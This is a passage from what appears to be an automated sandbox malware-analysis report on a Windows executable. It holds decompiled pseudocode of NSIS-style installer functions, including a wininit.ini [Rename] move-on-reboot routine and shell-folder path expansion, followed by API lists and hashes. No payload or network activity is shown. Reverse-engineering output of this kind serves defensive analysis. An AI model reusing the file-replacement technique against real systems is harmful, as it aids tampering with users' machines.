						E00404485(SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
						E004048AD();
						goto L13;
					}
				}
				_t117 = _a16;
				_t75 =  *(_t117 + 0x30);
				if(_t75 < 0) {
					_t75 =  *( *0x4291fc - 4 + _t75 * 4);
				}
				_t76 =  *0x42a258 + _t75 * 2;
				_t110 =  *_t76 & 0x0000ffff;
				_a8 = _t110;
				_t78 =  &(_t76[1]);
				_a16 = _t78;
				_v16 = _t78;
				_v12 = 0;
				_v8 = E004045D3;
				if(_t110 != 2) {
					_v8 = E00404599;
				}
				_push( *((intOrPtr*)(_t117 + 0x34)));
				_push(0x22);
				E00404463(_a4);
				_push( *((intOrPtr*)(_t117 + 0x38)));
				_push(0x23);
				E00404463(_a4);
				CheckDlgButton(_a4, (0 | ( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
				E00404485( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001);
				_t118 = GetDlgItem(_a4, 0x3e8);
				E00404498(_t118);
				SendMessageW(_t118, 0x45b, 1, 0);
				_t92 =  *( *0x42a230 + 0x68);
				if(_t92 < 0) {
					_t92 = GetSysColor( ~_t92);
				}
				SendMessageW(_t118, 0x443, 0, _t92);
				SendMessageW(_t118, 0x445, 0, 0x4010000);
				SendMessageW(_t118, 0x435, 0, lstrlenW(_a16));
				 *0x4216d4 = 0;
				SendMessageW(_t118, 0x449, _a8,  &_v16);
				 *0x4216d4 = 0;
				return 0;
			}

0x00404634
0x00404761
0x004047be
0x004047c2
0x0040488f
0x00404891
0x00404891
0x00404897
0x00404897
0x0040489a
0x00000000
0x004048a1
0x004047d0
0x004047d6
0x004047e0
0x004047eb
0x004047ee
0x004047f1
0x004047fc
0x004047ff
0x00404806
0x00404813
0x00404824
0x0040482a
0x00404832
0x00404840
0x00404846
0x00404846
0x00404806
0x00404850
0x00000000
0x0040485b
0x0040485f
0x0040486f
0x0040486f
0x00404875
0x00404881
0x00404881
0x00000000
0x00404885
0x00404850
0x0040476c
0x00000000
0x0040477e
0x0040477e
0x00404783
0x00404783
0x00404789
0x00000000
0x00000000
0x004047b2
0x004047b4
0x004047b9
0x00000000
0x004047b9
0x0040476c
0x0040463a
0x0040463d
0x00404642
0x00404653
0x00404653
0x0040465b
0x0040465e
0x00404662
0x00404665
0x00404669
0x0040466c
0x0040466f
0x00404672
0x00404679
0x0040467b
0x0040467b
0x00404685
0x00404692
0x0040469c
0x004046a1
0x004046a4
0x004046a9
0x004046c0
0x004046c7
0x004046da
0x004046dd
0x004046f1
0x004046f8
0x004046fd
0x00404702
0x00404702
0x00404710
0x0040471e
0x00404730
0x00404735
0x00404745
0x00404747
0x00000000

APIs

CheckDlgButton.USER32(?,-0000040A,00000001), ref: 004046C0
GetDlgItem.USER32 ref: 004046D4
SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 004046F1
GetSysColor.USER32(?), ref: 00404702
SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404710
SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040471E
lstrlenW.KERNEL32(?), ref: 00404723
SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00404730
SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 00404745
GetDlgItem.USER32 ref: 0040479E
SendMessageW.USER32(00000000), ref: 004047A5
GetDlgItem.USER32 ref: 004047D0
SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404813
LoadCursorW.USER32(00000000,00007F02), ref: 00404821
SetCursor.USER32(00000000), ref: 00404824
LoadCursorW.USER32(00000000,00007F00), ref: 0040483D
SetCursor.USER32(00000000), ref: 00404840
SendMessageW.USER32(00000111,00000001,00000000), ref: 0040486F
SendMessageW.USER32(00000010,00000000,00000000), ref: 00404881

Strings

N, xrefs: 004047BE
Call, xrefs: 004047FF

Memory Dump Source

Source File: 00000000.00000002.771758418.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.771749416.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771772921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771779733.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771816294.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771822433.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771834497.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771843257.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771862430.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3GJ6S3Kwnb.jbxd

Similarity

API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
String ID: Call$N
API String ID: 3103080414-3438112850
Opcode ID: 0388ebf4b552688962da2f0e60a0ed45a0ac6c6640f7b9ebe92ad344b143db63
Instruction ID: bd26b540472948519bfd0c296b0258925a36bd111cdc3ec084d9598cfd27fd02
Opcode Fuzzy Hash: 0388ebf4b552688962da2f0e60a0ed45a0ac6c6640f7b9ebe92ad344b143db63
Instruction Fuzzy Hash: A16180B1900209FFDB10AF61DD85AAA7B69FB84314F00853AFA05B62D1C7789D61CF99

Uniqueness

Uniqueness Score: -1.00%

Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
				struct tagLOGBRUSH _v16;
				struct tagRECT _v32;
				struct tagPAINTSTRUCT _v96;
				struct HDC__* _t70;
				struct HBRUSH__* _t87;
				struct HFONT__* _t94;
				long _t102;
				signed int _t126;
				struct HDC__* _t128;
				intOrPtr _t130;

				if(_a8 == 0xf) {
					_t130 =  *0x42a230;
					_t70 = BeginPaint(_a4,  &_v96);
					_v16.lbStyle = _v16.lbStyle & 0x00000000;
					_a8 = _t70;
					GetClientRect(_a4,  &_v32);
					_t126 = _v32.bottom;
					_v32.bottom = _v32.bottom & 0x00000000;
					while(_v32.top < _t126) {
						_a12 = _t126 - _v32.top;
						asm("cdq");
						asm("cdq");
						asm("cdq");
						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
						_t87 = CreateBrushIndirect( &_v16);
						_v32.bottom = _v32.bottom + 4;
						_a16 = _t87;
						FillRect(_a8,  &_v32, _t87);
						DeleteObject(_a16);
						_v32.top = _v32.top + 4;
					}
					if( *(_t130 + 0x58) != 0xffffffff) {
						_t94 = CreateFontIndirectW( *(_t130 + 0x34));
						_a16 = _t94;
						if(_t94 != 0) {
							_t128 = _a8;
							_v32.left = 0x10;
							_v32.top = 8;
							SetBkMode(_t128, 1);
							SetTextColor(_t128,  *(_t130 + 0x58));
							_a8 = SelectObject(_t128, _a16);
							DrawTextW(_t128, 0x429220, 0xffffffff,  &_v32, 0x820);
							SelectObject(_t128, _a8);
							DeleteObject(_a16);
						}
					}
					EndPaint(_a4,  &_v96);
					return 0;
				}
				_t102 = _a16;
				if(_a8 == 0x46) {
					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
					 *((intOrPtr*)(_t102 + 4)) =  *0x42a228;
				}
				return DefWindowProcW(_a4, _a8, _a12, _t102);
			}

0x0040100a
0x00401039
0x00401047
0x0040104d
0x00401051
0x0040105b
0x00401061
0x00401064
0x004010f3
0x00401089
0x0040108c
0x004010a6
0x004010bd
0x004010cc
0x004010cf
0x004010d5
0x004010d9
0x004010e4
0x004010ed
0x004010ef
0x004010ef
0x00401100
0x00401105
0x0040110d
0x00401110
0x00401112
0x00401118
0x0040111f
0x00401126
0x00401130
0x00401142
0x00401156
0x00401160
0x00401165
0x00401165
0x00401110
0x0040116e
0x00000000
0x00401178
0x00401010
0x00401013
0x00401015
0x0040101f
0x0040101f
0x00000000

APIs

DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32(?,?), ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010CF
FillRect.USER32 ref: 004010E4
DeleteObject.GDI32(?), ref: 004010ED
CreateFontIndirectW.GDI32(?), ref: 00401105
SetBkMode.GDI32(00000000,00000001), ref: 00401126
SetTextColor.GDI32(00000000,000000FF), ref: 00401130
SelectObject.GDI32(00000000,?), ref: 00401140
DrawTextW.USER32(00000000,00429220,000000FF,00000010,00000820), ref: 00401156
SelectObject.GDI32(00000000,00000000), ref: 00401160
DeleteObject.GDI32(?), ref: 00401165
EndPaint.USER32(?,?), ref: 0040116E

Strings

F, xrefs: 0040100C

Memory Dump Source

Source File: 00000000.00000002.771758418.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.771749416.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771772921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771779733.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771816294.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771822433.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771834497.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771843257.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771862430.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3GJ6S3Kwnb.jbxd

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F
API String ID: 941294808-1304234792
Opcode ID: 0581a76dac59d14a304b59f1a22efed427390318551c262ebfc8c4fa99717288
Instruction ID: ce1ac2179a7edcd12a9bbec6f3b07c603adbad34dac6b1105353c89659c02e28
Opcode Fuzzy Hash: 0581a76dac59d14a304b59f1a22efed427390318551c262ebfc8c4fa99717288
Instruction Fuzzy Hash: 63417B71800209EFCF058FA5DE459AF7BB9FF45315F00802AF991AA2A0CB74DA55DFA4

Uniqueness

Uniqueness Score: -1.00%

Function 0040614D Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 130
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040614D(void* __ecx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				long _t12;
				long _t24;
				char* _t31;
				int _t37;
				void* _t38;
				intOrPtr* _t39;
				long _t42;
				WCHAR* _t44;
				void* _t46;
				void* _t48;
				void* _t49;
				void* _t52;
				void* _t53;

				_t38 = __ecx;
				_t44 =  *(_t52 + 0x14);
				 *0x426da8 = 0x55004e;
				 *0x426dac = 0x4c;
				if(_t44 == 0) {
					L3:
					_t12 = GetShortPathNameW( *(_t52 + 0x1c), 0x4275a8, 0x400);
					if(_t12 != 0 && _t12 <= 0x400) {
						_t37 = wsprintfA(0x4269a8, "%ls=%ls\r\n", 0x426da8, 0x4275a8);
						_t53 = _t52 + 0x10;
						E00406544(_t37, 0x400, 0x4275a8, 0x4275a8,  *((intOrPtr*)( *0x42a230 + 0x128)));
						_t12 = E00405FF7(0x4275a8, 0xc0000000, 4);
						_t48 = _t12;
						 *(_t53 + 0x18) = _t48;
						if(_t48 != 0xffffffff) {
							_t42 = GetFileSize(_t48, 0);
							_t6 = _t37 + 0xa; // 0xa
							_t46 = GlobalAlloc(0x40, _t42 + _t6);
							if(_t46 == 0 || E0040607A(_t48, _t46, _t42) == 0) {
								L18:
								return CloseHandle(_t48);
							} else {
								if(E00405F5C(_t38, _t46, "[Rename]\r\n") != 0) {
									_t49 = E00405F5C(_t38, _t21 + 0xa, "\n[");
									if(_t49 == 0) {
										_t48 =  *(_t53 + 0x18);
										L16:
										_t24 = _t42;
										L17:
										E00405FB2(_t24 + _t46, 0x4269a8, _t37);
										SetFilePointer(_t48, 0, 0, 0);
										E004060A9(_t48, _t46, _t42 + _t37);
										GlobalFree(_t46);
										goto L18;
									}
									_t39 = _t46 + _t42;
									_t31 = _t39 + _t37;
									while(_t39 > _t49) {
										 *_t31 =  *_t39;
										_t31 = _t31 - 1;
										_t39 = _t39 - 1;
									}
									_t24 = _t49 - _t46 + 1;
									_t48 =  *(_t53 + 0x18);
									goto L17;
								}
								lstrcpyA(_t46 + _t42, "[Rename]\r\n");
								_t42 = _t42 + 0xa;
								goto L16;
							}
						}
					}
				} else {
					CloseHandle(E00405FF7(_t44, 0, 1));
					_t12 = GetShortPathNameW(_t44, 0x426da8, 0x400);
					if(_t12 != 0 && _t12 <= 0x400) {
						goto L3;
					}
				}
				return _t12;
			}

0x0040614d
0x00406156
0x0040615d
0x00406167
0x0040617b
0x004061a3
0x004061ae
0x004061b2
0x004061d2
0x004061d9
0x004061e3
0x004061f0
0x004061f5
0x004061fa
0x004061fe
0x0040620d
0x0040620f
0x0040621c
0x00406220
0x004062bb
0x00000000
0x00406236
0x00406243
0x00406267
0x0040626b
0x0040628a
0x0040628e
0x0040628e
0x00406290
0x00406299
0x004062a4
0x004062af
0x004062b5
0x00000000
0x004062b5
0x0040626d
0x00406270
0x0040627b
0x00406277
0x00406279
0x0040627a
0x0040627a
0x00406282
0x00406284
0x00000000
0x00406284
0x0040624e
0x00406254
0x00000000
0x00406254
0x00406220
0x004061fe
0x0040617d
0x00406188
0x00406191
0x00406195
0x00000000
0x00000000
0x00406195
0x004062c6

APIs

CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,004062E8,?,?), ref: 00406188
GetShortPathNameW.KERNEL32 ref: 00406191

Part of subcall function 00405F5C: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406241,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405F6C
Part of subcall function 00405F5C: lstrlenA.KERNEL32(00000000,?,00000000,00406241,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405F9E

GetShortPathNameW.KERNEL32 ref: 004061AE
wsprintfA.USER32 ref: 004061CC
GetFileSize.KERNEL32(00000000,00000000,004275A8,C0000000,00000004,004275A8,?,?,?,?,?), ref: 00406207
GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00406216
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 0040624E
SetFilePointer.KERNEL32(0040A580,00000000,00000000,00000000,00000000,004269A8,00000000,-0000000A,0040A580,00000000,[Rename],00000000,00000000,00000000), ref: 004062A4
GlobalFree.KERNEL32 ref: 004062B5
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 004062BC

Part of subcall function 00405FF7: GetFileAttributesW.KERNELBASE(00000003,004030BD,C:\Users\user\Desktop\3GJ6S3Kwnb.exe,80000000,00000003,?,?,?,?,?,00403847,?), ref: 00405FFB
Part of subcall function 00405FF7: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,?,?,00403847,?), ref: 0040601D

Strings

[Rename], xrefs: 00406236, 00406248
%ls=%ls, xrefs: 004061C2

Memory Dump Source

Source File: 00000000.00000002.771758418.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.771749416.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771772921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771779733.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771816294.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771822433.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771834497.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771843257.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771862430.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3GJ6S3Kwnb.jbxd

Similarity

API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
String ID: %ls=%ls$[Rename]
API String ID: 2171350718-461813615
Opcode ID: 103a52d89d2190fa92995d585e71df630d47c1fe56f755659e2bb6cae3d098e7
Instruction ID: ee14a5085299e91e75cde0480e6b7733258fb9cdf367bc6c01a907801337673b
Opcode Fuzzy Hash: 103a52d89d2190fa92995d585e71df630d47c1fe56f755659e2bb6cae3d098e7
Instruction Fuzzy Hash: 03312130201715BFD2207B619D48F2B3AACEF41718F16007EBD42F62C2DE3C982586AD

Uniqueness

Uniqueness Score: -1.00%

Function 00406544 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 196
stringCOMMON

Download Yara Rule

C-Code - Quality: 72%

			E00406544(void* __ebx, void* __edi, void* __esi, signed int _a4, short _a8) {
				struct _ITEMIDLIST* _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _t44;
				WCHAR* _t45;
				signed char _t47;
				signed int _t48;
				short _t59;
				short _t61;
				short _t63;
				void* _t71;
				signed int _t77;
				signed int _t78;
				short _t81;
				short _t82;
				signed char _t84;
				signed int _t85;
				void* _t98;
				void* _t104;
				intOrPtr* _t105;
				void* _t107;
				WCHAR* _t108;
				void* _t110;

				_t107 = __esi;
				_t104 = __edi;
				_t71 = __ebx;
				_t44 = _a8;
				if(_t44 < 0) {
					_t44 =  *( *0x4291fc - 4 + _t44 * 4);
				}
				_push(_t71);
				_push(_t107);
				_push(_t104);
				_t105 =  *0x42a258 + _t44 * 2;
				_t45 = 0x4281c0;
				_t108 = 0x4281c0;
				if(_a4 >= 0x4281c0 && _a4 - 0x4281c0 >> 1 < 0x800) {
					_t108 = _a4;
					_a4 = _a4 & 0x00000000;
				}
				_t81 =  *_t105;
				_a8 = _t81;
				if(_t81 == 0) {
					L43:
					 *_t108 =  *_t108 & 0x00000000;
					if(_a4 == 0) {
						return _t45;
					}
					return E00406507(_a4, _t45);
				} else {
					while((_t108 - _t45 & 0xfffffffe) < 0x800) {
						_t98 = 2;
						_t105 = _t105 + _t98;
						if(_t81 >= 4) {
							if(__eflags != 0) {
								 *_t108 = _t81;
								_t108 = _t108 + _t98;
								__eflags = _t108;
							} else {
								 *_t108 =  *_t105;
								_t108 = _t108 + _t98;
								_t105 = _t105 + _t98;
							}
							L42:
							_t82 =  *_t105;
							_a8 = _t82;
							if(_t82 != 0) {
								_t81 = _a8;
								continue;
							}
							goto L43;
						}
						_t84 =  *((intOrPtr*)(_t105 + 1));
						_t47 =  *_t105;
						_t48 = _t47 & 0x000000ff;
						_v12 = (_t84 & 0x0000007f) << 0x00000007 | _t47 & 0x0000007f;
						_t85 = _t84 & 0x000000ff;
						_v28 = _t48 | 0x00008000;
						_t77 = 2;
						_v16 = _t85;
						_t105 = _t105 + _t77;
						_v24 = _t48;
						_v20 = _t85 | 0x00008000;
						if(_a8 != _t77) {
							__eflags = _a8 - 3;
							if(_a8 != 3) {
								__eflags = _a8 - 1;
								if(__eflags == 0) {
									__eflags = (_t48 | 0xffffffff) - _v12;
									E00406544(_t77, _t105, _t108, _t108, (_t48 | 0xffffffff) - _v12);
								}
								L38:
								_t108 =  &(_t108[lstrlenW(_t108)]);
								_t45 = 0x4281c0;
								goto L42;
							}
							_t78 = _v12;
							__eflags = _t78 - 0x1d;
							if(_t78 != 0x1d) {
								__eflags = (_t78 << 0xb) + 0x42b000;
								E00406507(_t108, (_t78 << 0xb) + 0x42b000);
							} else {
								E0040644E(_t108,  *0x42a228);
							}
							__eflags = _t78 + 0xffffffeb - 7;
							if(__eflags < 0) {
								L29:
								E0040678E(_t108);
							}
							goto L38;
						}
						if( *0x42a2a4 != 0) {
							_t77 = 4;
						}
						_t121 = _t48;
						if(_t48 >= 0) {
							__eflags = _t48 - 0x25;
							if(_t48 != 0x25) {
								__eflags = _t48 - 0x24;
								if(_t48 == 0x24) {
									GetWindowsDirectoryW(_t108, 0x400);
									_t77 = 0;
								}
								while(1) {
									__eflags = _t77;
									if(_t77 == 0) {
										goto L26;
									}
									_t59 =  *0x42a224;
									_t77 = _t77 - 1;
									__eflags = _t59;
									if(_t59 == 0) {
										L22:
										_t61 = SHGetSpecialFolderLocation( *0x42a228,  *(_t110 + _t77 * 4 - 0x18),  &_v8);
										__eflags = _t61;
										if(_t61 != 0) {
											L24:
											 *_t108 =  *_t108 & 0x00000000;
											__eflags =  *_t108;
											continue;
										}
										__imp__SHGetPathFromIDListW(_v8, _t108);
										_a8 = _t61;
										__imp__CoTaskMemFree(_v8);
										__eflags = _a8;
										if(_a8 != 0) {
											goto L26;
										}
										goto L24;
									}
									_t63 =  *_t59( *0x42a228,  *(_t110 + _t77 * 4 - 0x18), 0, 0, _t108);
									__eflags = _t63;
									if(_t63 == 0) {
										goto L26;
									}
									goto L22;
								}
								goto L26;
							}
							GetSystemDirectoryW(_t108, 0x400);
							goto L26;
						} else {
							E004063D5( *0x42a258, _t121, 0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion",  *0x42a258 + (_t48 & 0x0000003f) * 2, _t108, _t48 & 0x00000040);
							if( *_t108 != 0) {
								L27:
								if(_v16 == 0x1a) {
									lstrcatW(_t108, L"\\Microsoft\\Internet Explorer\\Quick Launch");
								}
								goto L29;
							}
							E00406544(_t77, _t105, _t108, _t108, _v16);
							L26:
							if( *_t108 == 0) {
								goto L29;
							}
							goto L27;
						}
					}
					goto L43;
				}
			}

0x00406544
0x00406544
0x00406544
0x0040654a
0x0040654f
0x00406560
0x00406560
0x00406568
0x00406569
0x0040656a
0x0040656b
0x0040656e
0x00406576
0x00406578
0x00406589
0x0040658c
0x0040658c
0x00406590
0x00406596
0x00406599
0x00406774
0x00406774
0x0040677f
0x0040678b
0x0040678b
0x00000000
0x0040659f
0x004065a4
0x004065b9
0x004065ba
0x004065c0
0x00406752
0x00406760
0x00406763
0x00406763
0x00406754
0x00406757
0x0040675a
0x0040675c
0x0040675c
0x00406765
0x00406765
0x0040676b
0x0040676e
0x004065a1
0x00000000
0x004065a1
0x00000000
0x0040676e
0x004065c6
0x004065c9
0x004065d8
0x004065df
0x004065eb
0x004065ee
0x004065f1
0x004065f2
0x004065f7
0x004065fd
0x00406600
0x00406603
0x004066f6
0x004066fb
0x0040672e
0x00406733
0x00406738
0x0040673d
0x0040673d
0x00406742
0x00406748
0x0040674b
0x00000000
0x0040674b
0x004066fd
0x00406700
0x00406703
0x00406718
0x0040671f
0x00406705
0x0040670c
0x0040670c
0x00406727
0x0040672a
0x004066ee
0x004066ef
0x004066ef
0x00000000
0x0040672a
0x00406610
0x00406614
0x00406614
0x00406615
0x00406617
0x00406654
0x00406657
0x00406667
0x0040666a
0x00406672
0x00406678
0x00406678
0x004066d3
0x004066d3
0x004066d5
0x00000000
0x00000000
0x0040667c
0x00406681
0x00406682
0x00406684
0x0040669b
0x004066a9
0x004066af
0x004066b1
0x004066cf
0x004066cf
0x004066cf
0x00000000
0x004066cf
0x004066b7
0x004066c0
0x004066c3
0x004066c9
0x004066cd
0x00000000
0x00000000
0x00000000
0x004066cd
0x00406695
0x00406697
0x00406699
0x00000000
0x00000000
0x00000000
0x00406699
0x00000000
0x004066d3
0x0040665f
0x00000000
0x00406619
0x00406637
0x00406640
0x004066dd
0x004066e1
0x004066e9
0x004066e9
0x00000000
0x004066e1
0x0040664a
0x004066d7
0x004066db
0x00000000
0x00000000
0x00000000
0x004066db
0x00406617
0x00000000
0x004065a4

APIs

GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 0040665F
GetWindowsDirectoryW.KERNEL32(Call,00000400,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsj9DE8.tmp\System.dll,?,004055A0,Skipped: C:\Users\user\AppData\Local\Temp\nsj9DE8.tmp\System.dll,00000000,00000000,00418EC0,00000000), ref: 00406672
lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 004066E9
lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsj9DE8.tmp\System.dll,?,004055A0,Skipped: C:\Users\user\AppData\Local\Temp\nsj9DE8.tmp\System.dll,00000000), ref: 00406743

Strings

Software\Microsoft\Windows\CurrentVersion, xrefs: 0040662D
Call, xrefs: 0040656E, 00406621, 00406628, 0040662C, 00406649, 0040665E, 00406671, 00406686, 004066B3, 004066E8, 004066EE, 0040670B, 0040671E, 0040673C, 00406742, 0040674B, 00406781
\Microsoft\Internet Explorer\Quick Launch, xrefs: 004066E3
Skipped: C:\Users\user\AppData\Local\Temp\nsj9DE8.tmp\System.dll, xrefs: 00406569

Memory Dump Source

Source File: 00000000.00000002.771758418.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.771749416.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771772921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771779733.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771816294.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771822433.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771834497.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771843257.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771862430.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3GJ6S3Kwnb.jbxd

Similarity

API ID: Directory$SystemWindowslstrcatlstrlen
String ID: Call$Skipped: C:\Users\user\AppData\Local\Temp\nsj9DE8.tmp\System.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
API String ID: 4260037668-4255118187
Opcode ID: c443ed2fe3bb0bf6a7f47d91466dd90616c2d01c1c672cece4f8c154340eecc2
Instruction ID: a0e829acba6452fa9eccf544198c9fcc7de98ae724d9d0e98a153b46e40356ac
Opcode Fuzzy Hash: c443ed2fe3bb0bf6a7f47d91466dd90616c2d01c1c672cece4f8c154340eecc2
Instruction Fuzzy Hash: 5261E371A00215ABDB209F64DC40AAE37A5EF44318F11813AE957B72D0D77E8AA1CB5D

Uniqueness

Uniqueness Score: -1.00%

Function 00405569 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72
stringwindowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405569(signed int _a4, WCHAR* _a8) {
				struct HWND__* _v8;
				signed int _v12;
				WCHAR* _v32;
				long _v44;
				int _v48;
				void* _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				WCHAR* _t27;
				signed int _t28;
				long _t29;
				signed int _t37;
				signed int _t38;

				_t27 =  *0x429204;
				_v8 = _t27;
				if(_t27 != 0) {
					_t37 =  *0x42a2d4;
					_v12 = _t37;
					_t38 = _t37 & 0x00000001;
					if(_t38 == 0) {
						E00406544(_t38, 0, 0x4226e8, 0x4226e8, _a4);
					}
					_t27 = lstrlenW(0x4226e8);
					_a4 = _t27;
					if(_a8 == 0) {
						L6:
						if((_v12 & 0x00000004) == 0) {
							_t27 = SetWindowTextW( *0x4291e8, 0x4226e8);
						}
						if((_v12 & 0x00000002) == 0) {
							_v32 = 0x4226e8;
							_v52 = 1;
							_t29 = SendMessageW(_v8, 0x1004, 0, 0);
							_v44 = 0;
							_v48 = _t29 - _t38;
							SendMessageW(_v8, 0x104d - _t38, 0,  &_v52);
							_t27 = SendMessageW(_v8, 0x1013, _v48, 0);
						}
						if(_t38 != 0) {
							_t28 = _a4;
							0x4226e8[_t28] = 0;
							return _t28;
						}
					} else {
						_t27 = lstrlenW(_a8) + _a4;
						if(_t27 < 0x1000) {
							_t27 = lstrcatW(0x4226e8, _a8);
							goto L6;
						}
					}
				}
				return _t27;
			}

0x0040556f
0x00405579
0x0040557e
0x00405584
0x0040558f
0x00405592
0x00405595
0x0040559b
0x0040559b
0x004055a1
0x004055a9
0x004055ac
0x004055c9
0x004055cd
0x004055d6
0x004055d6
0x004055e0
0x004055e9
0x004055f5
0x004055fc
0x00405600
0x00405603
0x00405616
0x00405624
0x00405624
0x00405628
0x0040562a
0x0040562d
0x00000000
0x0040562d
0x004055ae
0x004055b6
0x004055be
0x004055c4
0x00000000
0x004055c4
0x004055be
0x004055ac
0x00405639

APIs

lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsj9DE8.tmp\System.dll,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,004033ED,00000000,?), ref: 004055A1
lstrlenW.KERNEL32(004033ED,Skipped: C:\Users\user\AppData\Local\Temp\nsj9DE8.tmp\System.dll,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,004033ED,00000000), ref: 004055B1
